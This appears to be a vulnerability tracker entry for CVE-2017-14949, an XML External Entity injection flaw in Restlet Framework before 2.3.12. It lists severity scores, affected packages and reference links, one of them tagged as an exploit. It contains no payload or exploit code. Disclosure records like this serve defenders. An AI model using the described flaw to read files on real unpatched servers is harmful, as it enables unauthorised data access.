CVE-2017-14949
HIGHRestlet Framework < 2.3.12 - XML External Entity Injection via REST API HTTP Request
Title source: llmDescription
Restlet Framework before 2.3.12 allows remote attackers to access arbitrary files via a crafted REST API HTTP request that conducts an XXE attack, because only general external entities (not parameter external entities) are properly considered. This is related to XmlRepresentation, DOMRepresentation, SaxRepresentation, and JacksonRepresentation.
References (2)
Core 2
Core References
Third Party Advisory x_refsource_misc
https://github.com/restlet/restlet-framework-java/wiki/XEE-security-enhancements
Exploit, Third Party Advisory x_refsource_misc
https://lgtm.com/blog/restlet_CVE-2017-14949
Scores
CVSS v3
7.5
EPSS
0.0241
EPSS Percentile
81.9%
Attack Vector
NETWORK
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
CWE
CWE-611
Status
published
Products (2)
org.restlet.jse/org.restlet
0 - 2.3.12Maven
restlet/restlet
< 2.3.12
Published
Nov 30, 2017
Tracked Since
Feb 18, 2026